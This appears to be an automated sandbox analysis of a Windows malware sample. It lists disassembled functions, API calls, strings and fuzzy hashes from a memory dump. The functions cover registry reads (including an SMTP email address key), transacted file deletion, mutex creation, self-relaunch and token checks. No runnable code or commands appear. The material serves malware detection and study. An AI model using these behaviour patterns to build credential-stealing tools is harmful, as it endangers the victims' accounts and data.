Opcode ID: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
Instruction ID: 84fe12fb3e25c27bb54342457b29e1adbaab05e93512211763e3781aba143f04
Opcode Fuzzy Hash: f3da31941f67786af58abdc84a3d63bc59a35e599f2a3f33a84cac361793eba7
Instruction Fuzzy Hash: B2314171E00109BBDB109B91DC88EEF7BBCEF89744F14406AF405E2210EBB8AE45DA65

Uniqueness

Uniqueness Score: -1.00%

Function 0045984D, Relevance: 13.8, APIs: 9, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64bf761513621c240173d8eb09f640e702f3a3721428f8f0640c6777a1b0ace
Instruction ID: 07b9d936a766d6b50e7dfe1019eefbb7ff4beb11db5ae68d8d4c2ca7d7772d3b
Opcode Fuzzy Hash: d64bf761513621c240173d8eb09f640e702f3a3721428f8f0640c6777a1b0ace
Instruction Fuzzy Hash: ACC1DDB0A04245EFEB11CF99D880BAEBBB1FF49305F04405AE9409B393D739AD45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00416EAD, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 322COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416EB2

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

.*-$, xrefs: 00417139
i`qv, xrefs: 0041723D
E@U, xrefs: 0041717D
Y, xrefs: 00417244
7>/(, xrefs: 004170DD
]s9<), xrefs: 0041722A

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate
String ID: .*-$$7>/($E@U$Y$]s9<)$i`qv
API String ID: 2428181759-1285848389
Opcode ID: 8b706bbff7847261b55f7aa8632601a8e4a789fe1a6eefa2e50d561dc7de0770
Instruction ID: 5c09770262b4dee08a45ab733f9034201edc935d23fd1d9822186e371322f0ec
Opcode Fuzzy Hash: 8b706bbff7847261b55f7aa8632601a8e4a789fe1a6eefa2e50d561dc7de0770
Instruction Fuzzy Hash: BCD1F330D04259CACF15DFA5D991AEDBBB1AF19304F2041AFE40A77282DB385B89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00425D3E, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 628COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00425D43

Strings

array, xrefs: 00425FF5
object, xrefs: 004264DA
number overflow parsing ', xrefs: 004263A5
), xrefs: 00426533
value, xrefs: 004262BB, 0042632D

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: )$array$number overflow parsing '$object$value
API String ID: 3519838083-413397775
Opcode ID: 7759a85489eeb4899244d81b9101cf88248840ba1256941ba5fa6ccc19be5658
Instruction ID: 3ce97c0f789aa3387115bd5a5ceed2ea5150592de24f01f3c4aced6363f5f78b
Opcode Fuzzy Hash: 7759a85489eeb4899244d81b9101cf88248840ba1256941ba5fa6ccc19be5658
Instruction Fuzzy Hash: F732C271D04218DFDF05DFA5D884BEEB7B8AF19304F50809FE415A7281DB389A49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0045590A, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

_free.LIBCMT ref: 00455A19
_free.LIBCMT ref: 00455A30
_free.LIBCMT ref: 00455A4D
_free.LIBCMT ref: 00455A68
_free.LIBCMT ref: 00455A7F

Strings

"PE, xrefs: 00455ABF, 00455913, 00455AD4

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: "PE
API String ID: 3033488037-2022024151
Opcode ID: 0ec47b41630c344badd182a19456e682981a9e3a5330307a7fcdcf265c2451ff
Instruction ID: 3bf21ee709f1d0c6971ebfa2f6eddaeea25822bb4e084cf80399478981681b89
Opcode Fuzzy Hash: 0ec47b41630c344badd182a19456e682981a9e3a5330307a7fcdcf265c2451ff
Instruction Fuzzy Hash: A451E372A00A04AFDB20DF69C891B7A73F4EF48725F14466EEC05D7252E738DD058B48

Uniqueness

Uniqueness Score: -1.00%

Function 00457E01, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 177fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00457596: GetConsoleCP.KERNEL32(00000005,~eD,00000000), ref: 004575DE

WriteFile.KERNEL32(?,00000000,?,00445098,00000000,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457F52
GetLastError.KERNEL32(?,0044657E), ref: 00457F5C
__dosmaperr.LIBCMT ref: 00457FA1

Strings

~eD, xrefs: 00457E17, 00457E84, 00457E93, 00457ED3, 00457F0F, 00457F1F, 00457F2F
~eD, xrefs: 00457E15, 00457E16
~eD, xrefs: 00457EDF, 00457F6E

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: ~eD$~eD$~eD
API String ID: 251514795-1598461380
Opcode ID: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
Instruction ID: c093bf76889acc17d1fa22036b65b016a06f1330f7e599f4f56079382a32407d
Opcode Fuzzy Hash: 27ad540d65e50a43cb431455240b37a87264fc6fb909ff777adbe444ef2102e1
Instruction Fuzzy Hash: C551D872908209AFEB11DBA4E841BEFB7B9EF05359F140467E900A7253D738DD09C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00438AD4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00438AD9
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,74B624D0,00000000,00000008), ref: 00438B5B
RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 00438BA8
RegCloseKey.ADVAPI32(?), ref: 00438BC9

Strings

$iEGLMJAcQM@, xrefs: 00438B89
@, xrefs: 00438B16

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseH_prologOpenQueryValue
String ID: $iEGLMJAcQM@$@
API String ID: 1233982722-1058998065
Opcode ID: 4c9c7a1768567f6a9af8e1919054a7b2c495c74b1734df97452942735bf46ba7
Instruction ID: 367bd93084d2a7a35925e445f485166969b1686228f1c74074b6aa4ed539c815
Opcode Fuzzy Hash: 4c9c7a1768567f6a9af8e1919054a7b2c495c74b1734df97452942735bf46ba7
Instruction Fuzzy Hash: 985178B0D002599ECB21CFA8D980AEEFBF9BF18304F14516EE449B7202DB745A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00434E00, Relevance: 10.6, APIs: 7, Instructions: 75stringregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
lstrlenW.KERNEL32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E4B
lstrcpyW.KERNEL32 ref: 00434E68
lstrcatW.KERNEL32(00000000,0047CC6C), ref: 00434E74
lstrcatW.KERNEL32(00000000,?), ref: 00434E82
RegEnumKeyExW.ADVAPI32(0043549A,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,00435370,00000001), ref: 00434EB6
RegCloseKey.ADVAPI32(0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434EC3

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$CloseEnumOpenlstrcpylstrlen
String ID:
API String ID: 2943937744-0
Opcode ID: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
Instruction ID: 3f527511bd662a90bea5e564ca16ff505b986783f0fc1497e79a41689b46f2dc
Opcode Fuzzy Hash: 0219d67e338bd40beddbb7ed987e369c0af50fc4acf4526ffcb48d48a81d74d0
Instruction Fuzzy Hash: 1D216375901118BFEB119F91DD49DEF7B7CEF09355F004066F905E1110EBB85E41CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 004135BF, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004135C4
std::_Lockit::_Lockit.LIBCPMT ref: 004135D2
int.LIBCPMT ref: 004135E9

Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E

std::_Facet_Register.LIBCPMT ref: 00413623
std::_Lockit::~_Lockit.LIBCPMT ref: 00413639
Concurrency::cancel_current_task.LIBCPMT ref: 0041364E

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 4824269c1deeefcb0dbb31ccf039a35977d0b5677e075813ca22ae46e9fe8536
Instruction ID: 3b004bb535eec8c03e116f6006be92b35a808e672c79bec6f86859ac7a2c8eb0
Opcode Fuzzy Hash: 4824269c1deeefcb0dbb31ccf039a35977d0b5677e075813ca22ae46e9fe8536
Instruction Fuzzy Hash: EB110E32D10115ABCB24EFA5C985AAF7764EB84328F10052FE814A7382DB789E00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043592B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
RegCloseKey.ADVAPI32(00000100), ref: 004359EE

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Strings

SMTP Email Address, xrefs: 00435932

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen_free
String ID: SMTP Email Address
API String ID: 3744367872-3214364705
Opcode ID: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
Instruction ID: bea77520f8f9eb75bb65e4d96276d8d86ba46bdd8d66cb8aacbcea5d3b3ef5e9
Opcode Fuzzy Hash: b2897442432286f6c7a9022d3ac1aee0ff1fca355918e22b49cf5c7a22221acd
Instruction Fuzzy Hash: 53319FB1A00609FBEF20DF51DC81FAB7769EF48764F105026FD04AA240E339DD018B69

Uniqueness

Uniqueness Score: -1.00%

Function 00439060, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70processCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00439095
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0043911E
CloseHandle.KERNEL32(?), ref: 00439127
CloseHandle.KERNEL32(?), ref: 00439130

Strings

N, xrefs: 004390CC

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$CreateFileModuleNameProcess
String ID: N
API String ID: 2820832629-1130791706
Opcode ID: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
Instruction ID: 68ee94fd2c3d38f532c313cd76568c7e192aa3a233b4418db67ca55748b57ded
Opcode Fuzzy Hash: 537e7a186abd502eaad7ebf34fdc1c2b917a28003db7b6770d01e220b166d494
Instruction Fuzzy Hash: 24218771D1024CBFEB019BA8DC85EEEB77CFF58304F005166F609A2021E6B15A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB39, Relevance: 7.8, APIs: 5, Instructions: 295memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BB3E
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0040BE1C
HeapFree.KERNEL32(00000000), ref: 0040BE23

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeH_prologProcess$Deallocate
String ID:
API String ID: 4229974167-0
Opcode ID: 4791b2dca9fa4f7a96e6c791f4d86fbd2ab3d60a3364a827af421a51dadcd750
Instruction ID: ff5ab6fc8fa2ec8c53a5ec707b9340397546a5a578c2f07b21ef2291de541eaa
Opcode Fuzzy Hash: 4791b2dca9fa4f7a96e6c791f4d86fbd2ab3d60a3364a827af421a51dadcd750
Instruction Fuzzy Hash: DBC14A71C00248DBCF15DFE5D990ADDFBB5AF18304F60806EE815B7291DB786A48CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042026B, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 0042027F
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042028D
_strcat.LIBCMT ref: 004202F3
GetFileAttributesA.KERNEL32(00000000,00000000,?), ref: 00420310
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00420324

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$_strcat
String ID:
API String ID: 2481838186-0
Opcode ID: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
Instruction ID: 926b765d940c7e4cf03c66ed4fade1eb7be7ee2715b4740a0b314bdbf1d4a8a6
Opcode Fuzzy Hash: 5386050ffdcb0e579c67ccba1131c0ef88f796de169c57935e7edbd14464b3f9
Instruction Fuzzy Hash: B7116A71F0032457CB204668BC8CBDB77AC9F56314F9401E7E59593292DAB84D85467C

Uniqueness

Uniqueness Score: -1.00%

Function 00409478, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040947D

Part of subcall function 0043F433: FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449

LocalFree.KERNEL32(0000000F,unknown error,0000000D), ref: 004094C3
LocalFree.KERNEL32(?), ref: 004094DC

Strings

unknown error, xrefs: 004094A8

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocal$FormatH_prologMessage
String ID: unknown error
API String ID: 252809769-3078798498
Opcode ID: 2db4dc4c1e5e5555505e2b08480146aad6ece04c266066ea01a146b90769ed6f
Instruction ID: 143033a275fd9ea4cf15bf30338bea89ac0712dc1e52f0ce6ff51ee7e44748fa
Opcode Fuzzy Hash: 2db4dc4c1e5e5555505e2b08480146aad6ece04c266066ea01a146b90769ed6f
Instruction Fuzzy Hash: F1014471900205AFDB11EFA5C941AAEBBB5FF18304F10843FB449B7252D7789E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004095E7, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004095EC
std::_Lockit::_Lockit.LIBCPMT ref: 004095FC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00409639

Part of subcall function 0043F8E5: _Yarn.LIBCPMT ref: 0043F904
Part of subcall function 0043F8E5: _Yarn.LIBCPMT ref: 0043F928

Strings

bad locale name, xrefs: 00409652

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Yarnstd::_$H_prologLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 2550485109-1405518554
Opcode ID: 5ac6100a9ca4774aba9c13cb6669a1ed42e62de5a9c01041e4096a03338de0e5
Instruction ID: 31eaf81fc067cb3049c194bbb17bc60594ae06bbf35183faff589a425f7e7705
Opcode Fuzzy Hash: 5ac6100a9ca4774aba9c13cb6669a1ed42e62de5a9c01041e4096a03338de0e5
Instruction Fuzzy Hash: 0E015E71905B40DEC325DF6A848154AFBE0BF2C314B50893FE09ED3A01D334A904CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0043EDE9, Relevance: 6.1, APIs: 4, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0043EC21: CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043EF0B,?,0040B6A1,00000000,?,?,?,?,0040B6A1,?), ref: 0043EC31

CreateFileW.KERNEL32(?,00000081,00000000,00000000,00000003,00000000,00000000,?,0040B6A1,00000001,?,?,?,?,0040B6A1,?), ref: 0043EE31
GetLastError.KERNEL32(?,?,0040B6A1,?,?,?,?,?,?,00000000,?), ref: 0043EE3E

Part of subcall function 0043EC56: CloseHandle.KERNEL32(000000FF,?,0043F31E,?,?,?,00000080,?), ref: 0043EC62

CreateFileW.KERNEL32(0040B6A1,00000082,00000000,00000000,00000003,00000000,00000000,?,?,0040B6A1,?,?), ref: 0043EE6F
GetLastError.KERNEL32(?,?,0040B6A1,?,?,?,?,?,?,00000000,?), ref: 0043EE7C

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseCopyHandle
String ID:
API String ID: 1748377786-0
Opcode ID: 0523ac7acdf49ba59a6fa57aa7c90fcb5d701ac867f32195bcedb89e461acc75
Instruction ID: f3148ced24aea4c6fe529a70361ff3d9a58b080bd54d29d9bdfa659a1503fe1e
Opcode Fuzzy Hash: 0523ac7acdf49ba59a6fa57aa7c90fcb5d701ac867f32195bcedb89e461acc75
Instruction Fuzzy Hash: 8331A671A02119BFDB21ABB78C829BF76ACAF0C714F042526F910D62C2D7B8DD019669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7F6, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00488780,00000000,?,?,004207F8,00000000,?,00000000), ref: 0040B80A
CreateDirectoryTransactedA.KERNEL32 ref: 0040B823
CommitTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B82E
RollbackTransaction.KTMW32(00000000,?,004207F8,00000000,?,00000000,00000000), ref: 0040B836

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$Create$CommitDirectoryRollbackTransacted
String ID:
API String ID: 629542334-0
Opcode ID: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
Instruction ID: b18be14526ba35e09e9024abd98d8d90bc636f0dd60b729d8671da52b2d2403f
Opcode Fuzzy Hash: 50e14b63ca18d633df6a308b7ec4a38018a85421cc885a30688cbf6e21692c77
Instruction Fuzzy Hash: 53F0B472A00115BFE71027999CCCD677A2CEB457B47144636FA22A22E0F7B09C4186FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7A7, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC
RollbackTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7E4

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
String ID:
API String ID: 3802493581-0
Opcode ID: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
Instruction ID: 58dbb2a7c24e90d438a2da79032e2a45378735c8f22fe598a552312de627870f
Opcode Fuzzy Hash: 87cd324ad1989c0657320156594595a03bd9424eab885f956801388e9c53cdfe
Instruction Fuzzy Hash: 1BF08272A00111BFE7205B6A9C0DD6B766DDB8A770714063AFC22E72D0E7B49D4186BF

Uniqueness

Uniqueness Score: -1.00%

Function 0042BFF5, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000), ref: 0042C008
RemoveDirectoryTransactedA.KERNEL32 ref: 0042C01F
CommitTransaction.KTMW32(00000000,?,00000000), ref: 0042C02A
RollbackTransaction.KTMW32(00000000,?,00000000), ref: 0042C032

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Transaction$CommitCreateDirectoryRemoveRollbackTransacted
String ID:
API String ID: 1201024725-0
Opcode ID: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
Instruction ID: 183120d38f6de6230f0cb0750d318de0fef5fbbbb85c50116f72fc63eed6bb1a
Opcode Fuzzy Hash: 52e9d3ae115f385b2bf6edc5f6143662b3c9fc35e394ef1331fad7615f1dd12f
Instruction Fuzzy Hash: 21F0E272B00120FFE7200BA9AC4CD7B766CDB46770B10062AFC22D72D0E6B49D4186BA

Uniqueness

Uniqueness Score: -1.00%

Function 00435BAC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,?), ref: 00435BC4
OpenProcessToken.ADVAPI32(00000000), ref: 00435BCB
GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 00435BDD
CloseHandle.KERNEL32(?,?,00000200), ref: 00435BEA

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
String ID:
API String ID: 1246687928-0
Opcode ID: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
Instruction ID: ef9c7944da9d0fbe57d85c82d9cb878354d8ff5e49230341588292012951431b
Opcode Fuzzy Hash: 69e4764cfb4a4ffa93866ed4cffa959fab9716cde869fc8d8eef6bd74acf3750
Instruction Fuzzy Hash: DBF01C71E10208BBEB109BA0DC49EAA7BACEB09244F1000A5E802E1150E6B5EA009A6A

Uniqueness

Uniqueness Score: -1.00%

Function 00457A19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000005,~eD,00000000,?,00457F36,00000010,~eD,00000000,?,00421A56,~eD), ref: 00457AB5
GetLastError.KERNEL32(?,00457F36,00000010,~eD,00000000,?,00421A56,~eD,~eD,00000010,00445098,00000000,00000005,00421A56,00421A56,?), ref: 00457ADB

Strings

~eD, xrefs: 00457A4E

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: ~eD
API String ID: 442123175-3356853795
Opcode ID: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
Instruction ID: bf65c0e4729e722a36b1f943ebc6129d69d6e6920ac8c12f1595faf670b95aa8
Opcode Fuzzy Hash: d3e58a8c19795838d8790d9ee971bd9e06b8036a9d053c66fc8a29a12884aee6
Instruction Fuzzy Hash: F1217E30A042199BDF15CF29DD80AEDB7B9EB49306F2440BAED06D7212D634DE46CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00411CAC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00411CB1

Part of subcall function 00412B79: __EH_prolog.LIBCMT ref: 00412B7E

Part of subcall function 00413337: __EH_prolog.LIBCMT ref: 0041333C
Part of subcall function 00413337: std::locale::_Init.LIBCPMT ref: 0041335A

Strings

xOA, xrefs: 00411D09
%A, xrefs: 00411D2A

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Initstd::locale::_
String ID: xOA$%A
API String ID: 1266419734-3904200367
Opcode ID: cd6a8ab17e015662145e29156e0b4bdbea8a4b5cd25032890fc7092bd14f2c5e
Instruction ID: f1a27dd51c70cf562e9aca30f2b58ce8241449ca7746ca85f8da3430734811d3
Opcode Fuzzy Hash: cd6a8ab17e015662145e29156e0b4bdbea8a4b5cd25032890fc7092bd14f2c5e
Instruction Fuzzy Hash: 081166B1A00616AFD705CF69C981A99FBF4FF48304F10822FA019D3701E7B4AE50CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004360E7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39synchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32 ref: 00436130
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D

Strings

ENXX, xrefs: 004360F7

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Mutex$CreateOpen
String ID: ENXX
API String ID: 4030545807-3763919171
Opcode ID: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
Instruction ID: d7b7153b0c48b5d91a1f0c999520678bb0e8285682fdc18e12bdb9ee44f3034a
Opcode Fuzzy Hash: 15fe73319a016700f1fa3f76bfd36faf01a2ded22a65ec7536cca4f95705d9f2
Instruction Fuzzy Hash: D0F04610D083897ACF029BF90C458FFBFFC9D1E284F40A06EE84163203F5A4454583BA

Uniqueness

Uniqueness Score: -1.00%

Function 004542F3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045433B

Strings

`,i, xrefs: 0045432D

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID: `,i
API String ID: 269201875-3133775968
Opcode ID: e23c552bf6bfc6e7df87c784f5635b051a6b7052c5b1130287b4626a5af3a196
Instruction ID: d5218cd339a65762510a81b9e079e4446c8f6c3996e41a5cb6ded0dde42ff173
Opcode Fuzzy Hash: e23c552bf6bfc6e7df87c784f5635b051a6b7052c5b1130287b4626a5af3a196
Instruction Fuzzy Hash: 49E0303270951066D221662B6C0566E15859BD133FF11033FFC208E5F2DB6C488A959E

Uniqueness

Uniqueness Score: -1.00%

Function 00452622, Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E

_free.LIBCMT ref: 004526D1
_free.LIBCMT ref: 004526FF
_free.LIBCMT ref: 00452747

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: dc16995ec5d54401d950232530a0f8777f00b001162fc32b91916d6ac7798e1e
Instruction ID: 6281fea4de83cea335c9020f67f2b636437e58e66c07028cc3950e3dc999de6a
Opcode Fuzzy Hash: dc16995ec5d54401d950232530a0f8777f00b001162fc32b91916d6ac7798e1e
Instruction Fuzzy Hash: AB41AE31604106AFD724CFACC985E6AB3E9EF4A315B24056FE805C7392DBB5EC189B84

Uniqueness

Uniqueness Score: -1.00%

Function 00452786, Relevance: 4.6, APIs: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 004527B2
__cftoe.LIBCMT ref: 004527E4
_free.LIBCMT ref: 0045280A

Memory Dump Source

Source File: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __cftoe$_free
String ID:
